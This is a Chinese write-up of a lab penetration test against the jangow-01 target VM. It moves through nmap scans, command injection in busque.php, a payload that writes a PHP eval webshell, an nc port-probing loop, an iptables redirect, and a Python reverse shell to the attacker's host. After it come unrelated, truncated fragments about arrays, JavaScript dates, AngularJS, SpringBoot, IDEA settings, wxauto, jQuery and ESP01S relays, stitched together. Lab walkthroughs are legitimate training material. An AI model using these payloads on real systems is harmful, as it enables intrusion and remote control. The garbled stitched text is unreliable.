靶机:jangow-01-1.0.1
攻击机:kali linux2022.4
靶机描述
使用nmap扫描网段
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.70.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:56 EST
Nmap scan report for 192.168.70.1
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.70.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.70.2
Host is up (0.000056s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.70.152
Host is up (0.00027s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
MAC Address: 00:0C:29:67:A6:61 (VMware)
Nmap scan report for 192.168.70.254
Host is up (0.00022s latency).
All 1000 scanned ports on 192.168.70.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:EA:9C:6A (VMware)
Nmap scan report for 192.168.70.137
Host is up (0.0000070s latency).
All 1000 scanned ports on 192.168.70.137 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (5 hosts up) scanned in 11.44 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p- 192.168.70.152
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:59 EST
Nmap scan report for 192.168.70.152
Host is up (0.00042s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
MAC Address: 00:0C:29:67:A6:61 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.70.152
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds
先访问80端口
可以发现是一个目录遍历,查找一下有用信息
在site目录下发现一个网站
四处看看功能点
发现了一个可以传参得接口
http://192.168.70.152/site/busque.php?buscar=
对变量buscar进行测试
传入参数1
没什么回显,传入id
在该参数发现存在rce
利用该漏洞写入webshell
payload
192.168.70.152/site/busque.php?buscar=echo '<?php @eval($_POST["shell"]); ' > shell.php
查看目录写入成功
使用蚁剑连接木马
成功连接shell
home的用户目录中看到了user.txt
是一段md值使用somd5解码
点此即达-->somd5
这里可以发现是空密码
目前不知道有什么用
写个脚本端口是否被限制
#!/bin/bash
for i in {1..65535};
do
timeout 1 nc -vz 192.168.70.137 $i && echo "$i open" >> out.txt || echo "$i closed" >> out.txt;
done
kali设置防火墙权限
iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234
然后打开nc监听端口
赋予权限运行脚本
对防火墙做了端口绑定所以直接监听1234端口即可,目标主机连接kali的443端口就可以反弹shell了
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.70.137",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
拿到完整shell之后查看内核信息
ubuntu16.04直接查找相关得exp
上传exp
编译赋权执行
提权成功
查看root目录找找flag
之前用户目录也获取到了md5值,应该就是这个靶机得flag了
数组理论基础数组是存放在连续内存空间上的相同类型数据的集合。数组下标从0开始数组内存空间的地址是连续的c++中vector和array的区别1、vector是顺序容器,其利用连续的内存空间来存储元素,但是其内存空间大小是能够改变的。2、array是顺序容器,其也是利用连续的内存空间来存储元素,但它的内存空间是固定大小的,申请之后就无法改变。3、vector的底层是array实现的二维数组二维数组在内存的空间地址是连续的704|二分查找思路1、把整个数组一分为二;2、判断目标值在左区间还是右区间,若在左区间,则修改右区间指针的位置;若在右区间,则修改新区间的左区间位置3、重复上述过程,直到lef
在angularjs(1.6.1)中使用该类型的输入,为9.03到9.05之间的值提供undefined。使用其他值时会重现此问题,其中包括9.62、9.63、17.31。这fiddle重现问题。只需在数字输入中单击向上即可。在linuxmint18下的firefox和chromium上测试。它似乎链接到"step"属性。如果设置为"0.001"就没有问题。但是我在这个应用程序中威胁金钱,所以需要2位小数。注意:如果值最初通过data-numeric-value设置为9.03,则它不是未定义.这个错误有什么解决方法吗?编辑已更新fiddle显示step="0.01"与step="0.0
(newDate('2012-12-01')).getMonth()是10而不是11(getMonth是从0开始索引的)。我已经在Firefox、Chrome和Node.js上进行了测试。为什么会这样? 最佳答案 您遇到时区问题。您的JS引擎将字符串解释为UTC,因为它没有进一步指定。来自specificationofDate.parse(由newDate使用):TheStringmaybeinterpretedasalocaltime,aUTCtime,oratimeinsomeothertimezone,dependingont
文章目录前言软件开发整体介绍软件开发流程瑞吉外卖项目介绍项目介绍产品原型展示技术选型功能架构角色开发环境搭建数据库环境搭建maven项目搭建设置静态资源映射后台登录需求分析代码开发功能测试后台退出需求分析代码开发功能测试🌕博客x主页:己不由心王道长🌕!🌎文章说明:SpringBoot项目-瑞吉外卖【day01】🌎✅系列专栏:SpringBoot项目🌴本篇内容:对黑马的瑞吉外卖项目的day01进行笔记和项目实现🌴☕️每日一语:人有退路,就有些许安全感。等到哪一天,你真没了退路,你就发现眼前哪条路都能走,也能通。☕️🚩交流社区:己不由心王道长(优质编程社区)前言从今天开始,正式进入项目阶段。本次的
消除idea顶部窗口上的白色标题栏点击Hlep,找到EditCustomVMOptions...点击添加下面一段话(如果有责显示为false责改为true):-Dide.win.frame.decoration=true然后重启即可,如下图所示,顶部白框已经没有出现了
前言一个需求需要利用Python+第三方库wxauto用于微信上自动获取聊天信息,从而根据自己需求对信息自动进行二次处理,比如自动回复,再比如自动发送文件或者其他。这边使用Python的第三方库`wxauto`来进行开发,而不是`itchat` ---记录于2022年07月 ---2023年1月再次测试可用使用Python3的第三方库wxauto,它适用于Windows的微信客户端官网:https://github.com/cluic/wxauto原因这边使用wxauto来进行开发,而不是itchat,原因如下itchat都是之前的教
使用VisualStudio2013,我将一个混合的Asp.NetWebforms/MVC3Web应用程序迁移到Asp.NetWebforms/MVC5.1。作为迁移的一部分,我使用NuGet包管理器将Jquery从1.9.1升级到2.1.1。当我在Chrome的VisualStudio2013调试器中运行应用程序时,我没有遇到任何问题。当我在IE9的VisualStudio2013调试器中运行应用程序时(兼容模式未打开),首先加载带有这两个脚本标记的母版页:由于此Javascript错误而失败:Unhandledexceptionatline3425,column4inhttp://
我刚刚发现如果我使用newDate('2015-1-1'),时间是没有时区影响的,但是如果我使用newDate('2015-01-01')时间在Node.js中具有时区效果。我输出4Date():console.log(newDate('2015-1-1'));console.log(newDate('2015-01-1'));console.log(newDate('2015-1-01'));console.log(newDate('2015-01-01'));输出是ThuJan01201500:00:00GMT+0800(CST)ThuJan01201500:00:00GMT+08
一.使用ESP01S模块,PIN脚定义如下:管脚功能如下:ESP01S模块原理图:ESP01S模块比ESP01模块做了以下优化:LED灯的管脚发生变化,由ESP01的TXD0变成ESP01s的GPIO2引脚;ESP01s模块的IO0、RST、EN引脚上加了上拉电阻,也就是说在连接了3v3引脚后这三个引脚也自动连接上高电平,无需再EN引脚上外接高电平。ESP01模块外接引脚图:ESP01S模块外接引脚图:二.继电器模块选择:使用以下所示隔离款继电器模块原理图如下:模块使用GPIO0驱动继电器,但是ESP01S模块在上电时GPIO0会不受控制翻转,网上很多建议加电容但是效果不是很好,这里直接使用R
我使用javascript函数来存储cookie:createCookie("teaser","teaser",7);functioncreateCookie(name,value,days){varexpires="";if(days){vardate=newDate();date.setTime(date.getTime()+(days*24*60*60*1000));expires=";expires="+date.toGMTString();}document.cookie=name+"="+value+expires+";path=/";returnvalue;}当我检查浏览